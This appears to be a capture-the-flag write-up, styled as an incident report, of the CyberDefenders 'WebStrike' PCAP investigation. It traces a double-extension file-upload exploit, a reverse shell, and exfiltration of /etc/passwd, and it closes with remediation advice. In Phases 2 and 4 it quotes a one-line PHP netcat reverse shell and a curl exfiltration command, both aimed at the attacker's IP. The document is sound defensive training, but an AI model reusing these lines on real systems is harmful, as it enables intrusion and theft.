Incident Response Report: WebStrike — Server Compromise & Network Forensics Investigation
Platform: CyberDefenders
Challenge: WebStrike
Category: Network Forensics / Incident Response
Difficulty: Medium
Classification: Confidential
Tools: Wireshark, AbuseIPDB, IP Geolocation, OSINT
Achievement: Proof of Completion
1. Executive Summary
Incident Type: Web Server Compromise / Reverse Shell / Data Exfiltration
Analyst: Lead SOC Analyst / Threat Hunter
A severe security incident occurred on the WebStrike corporate web server (24.49.63.79). Development teams flagged anomalous behavior, prompting a full network packet capture (PCAP) analysis.
The investigation revealed that an external threat actor successfully compromised the web server by exploiting an unrestricted file upload vulnerability. By bypassing weak extension filters using a double-extension technique (.jpg.php), the attacker uploaded a malicious PHP script. Upon execution, this script established an interactive reverse shell back to the attacker’s infrastructure. Operating as the www-data user, the attacker performed internal reconnaissance and successfully exfiltrated sensitive system configuration files (/etc/passwd).
Indicators of Compromise (IOCs)
| Type | Indicator | Description |
|---|---|---|
| Attacker IP | 117.11.88.124 | External threat actor IP, geolocated to Tianjin, China. |
| Victim IP | 24.49.63.79 | Compromised WebStrike Apache Web Server. |
| Malicious File | image.jpg.php | PHP reverse shell disguised as a JPEG image. |
| C2 Port | 8080 (TCP) | Port used by the attacker to catch the reverse shell. |
| User-Agent | Mozilla/5.0 (X11; Linux x86_64; rv:109.0)... | Fingerprint heavily associated with Kali Linux default browsers. |
MITRE ATT&CK Mapping Overview
| Tactic | Technique | ID |
|---|---|---|
| Initial Access | Exploit Public-Facing Application | T1190 |
| Execution | Command and Scripting Interpreter: Unix Shell | T1059.004 |
| Persistence | Server Software Component: Web Shell | T1505.003 |
| Command and Control (C2) | Proxy (Reverse connection over non-standard port 8080) | T1090 |
| Discovery | Account Discovery: Local Account | T1087.001 |
| Exfiltration | Exfiltration Over C2 Channel | T1041 |
2. Phase 1: Reconnaissance & Attacker Identification
Objective: Isolate the threat actor’s IP and establish their identity through OSINT enrichment.
Initial PCAP Triage
Initial triage of the PCAP file focused on isolating communication between the web server and external entities. Traffic volume and repetitive HTTP requests quickly isolated IP 117.11.88.124 as the primary threat actor.
OSINT Enrichment: IP Geolocation
OSINT enrichment via IP geolocation and threat intelligence databases (AbuseIPDB) confirmed the IP originates from Tianjin, China. The IP has a documented history of port scanning and unauthorized connection attempts, providing high confidence of malicious intent.
OSINT Enrichment: AbuseIPDB Threat Intelligence
Analyst Note:
The IP117.11.88.124has been reported 19 times from 7 distinct sources on AbuseIPDB, with categories including Port Scan, Hacking, and Exploited Host. This corroborates the assessment of malicious intent.
User-Agent Analysis
Analysis of the HTTP request headers revealed a consistent User-Agent string: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0. This specific combination (Firefox ESR on Linux x86_64) is highly indicative of an attacker operating from a default Kali Linux distribution, highlighting a lack of operational security (OpSec) by the threat actor.
3. Phase 2: Execution & Web Shell Deployment
Objective: Determine the method of compromise by analyzing HTTP traffic for malicious data submissions.
Identifying the Attack Vector
To determine the method of compromise, traffic was filtered for HTTP POST requests (http.request.method == "POST"), revealing the attacker’s interaction with the /reviews/upload.php endpoint.
HTTP Stream Analysis: The Exploit
Following the HTTP stream of this POST request exposed the core exploit. The attacker intercepted a legitimate review form and injected a malicious payload.
Vulnerability Exploited: The application failed to properly validate uploaded file types. The attacker utilized a double-extension bypass, naming their payload image.jpg.php. The server likely checked for the presence of .jpg, but Apache executed the file based on its terminating extension (.php).
The payload contained the following highly malicious PHP command:
1
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 117.11.88.124 8080 >/tmp/f"); ?>
This script leverages a named pipe to spawn an interactive bash shell (/bin/sh) and pipes it through Netcat (nc) back to the attacker.
MITRE ATT&CK Reference:
This attack leverages T1190 - Exploit Public-Facing Application (exploiting the file upload form) and T1505.003 - Server Software Component: Web Shell (deployingimage.jpg.phpas a persistent web shell). The execution of the reverse shell maps to T1059.004 - Command and Scripting Interpreter: Unix Shell.
4. Phase 3: Triggering the Payload & Command and Control (C2)
Objective: Trace how the attacker located and executed their uploaded web shell.
Directory Brute-Forcing
Uploading a web shell does not automatically execute it. The attacker was observed performing basic directory brute-forcing (attempting to access /admin/uploads and /uploads which resulted in 404 errors) to locate their payload.
Triggering the Reverse Shell
Ultimately, the attacker successfully identified the storage directory as /reviews/uploads/. By sending a GET request to /reviews/uploads/image.jpg.php, the attacker forced the Apache server to interpret the PHP code, officially triggering the reverse shell connection back to their machine on port 8080.
Analyst Note:
The attacker’s need to brute-force the upload directory suggests limited prior reconnaissance of the application’s directory structure. The upload directory/reviews/uploads/was not immediately obvious, and the attacker required multiple attempts to locate it.
5. Phase 4: Post-Exploitation & Data Exfiltration
Objective: Analyze the attacker’s actions after establishing a reverse shell.
Reverse Shell Session Analysis
With a stable reverse shell established over TCP port 8080, the attacker gained command-line access as the www-data service account. By following the TCP stream of this connection, the entirety of the attacker’s post-exploitation session was captured.
The attacker executed standard situational awareness commands (whoami, uname -a, pwd, ls /home) to map the internal environment and search for privilege escalation vectors.
Data Exfiltration
Finally, the attacker targeted sensitive system files. They read the contents of the user directory file and used the curl utility to exfiltrate the data back to their own infrastructure over port 443 (HTTPS), attempting to blend in with standard web traffic.
Exfiltrated File: /etc/passwd
Exfiltration Command:
1
curl -X POST -d /etc/passwd http://117.11.88.124:443/
MITRE ATT&CK Reference:
The post-exploitation activity maps to:
- T1087.001 - Account Discovery: Local Account (Reading
/etc/passwd)- T1041 - Exfiltration Over C2 Channel (Using
curlto POST data back to the attacker)- T1090 - Proxy (Reverse connection over non-standard port 8080 for C2)
6. Remediation & Mitigation Recommendations
To prevent future compromises of this nature, the following actions must be taken immediately:
Strict Input Validation
Rewrite the file upload handling logic on /reviews/upload.php. Implement strict allow-listing for MIME types (e.g., image/jpeg, image/png) rather than relying on block-listing or simple string matching.
File Renaming Strategy
Never store uploaded files using their original, user-supplied names. Implement a mechanism to programmatically rename files (e.g., generating a unique hash) and strip all original file extensions to neutralize double-extension attacks.
Execution Prevention
Configure the Apache web server to explicitly deny the execution of scripts (PHP, CGI, etc.) within the /reviews/uploads/ directory.
Network Segmentation & Firewalling
Immediately block all inbound and outbound traffic to the known malicious IP (117.11.88.124). Furthermore, restrict the web server’s ability to initiate outbound connections (like the curl command) to the internet, unless explicitly required for business purposes.
7. Conclusion
The WebStrike investigation demonstrates a complete web server compromise from initial exploitation to data exfiltration. Key findings include:
Initial Access: Exploitation of an unrestricted file upload vulnerability on
/reviews/upload.phpusing a double-extension bypass (image.jpg.php).Attacker Profile: The threat actor operated from IP
117.11.88.124(Tianjin, China) using a default Kali Linux distribution, indicating a lack of operational security.Execution: A PHP reverse shell was uploaded and triggered, establishing a persistent connection back to the attacker on TCP port 8080.
Post-Exploitation: The attacker performed internal reconnaissance as the
www-datauser and successfully exfiltrated/etc/passwdusingcurlover port 443.Impact: Sensitive system configuration data was exfiltrated, potentially exposing user account information and enabling further attacks.
Key Takeaways for the SOC:
- Input Validation: Implement strict file upload validation with MIME type allow-listing and file renaming.
- Web Server Hardening: Disable script execution in upload directories.
- Network Monitoring: Alert on outbound connections from web servers, especially on suspicious ports (8080, 443 from non-browser processes).
- Threat Intelligence: Monitor and block known malicious IPs using threat feeds from AbuseIPDB and similar platforms.
Analysis Date: February 27, 2026
Analyst: El OMARI Zakaria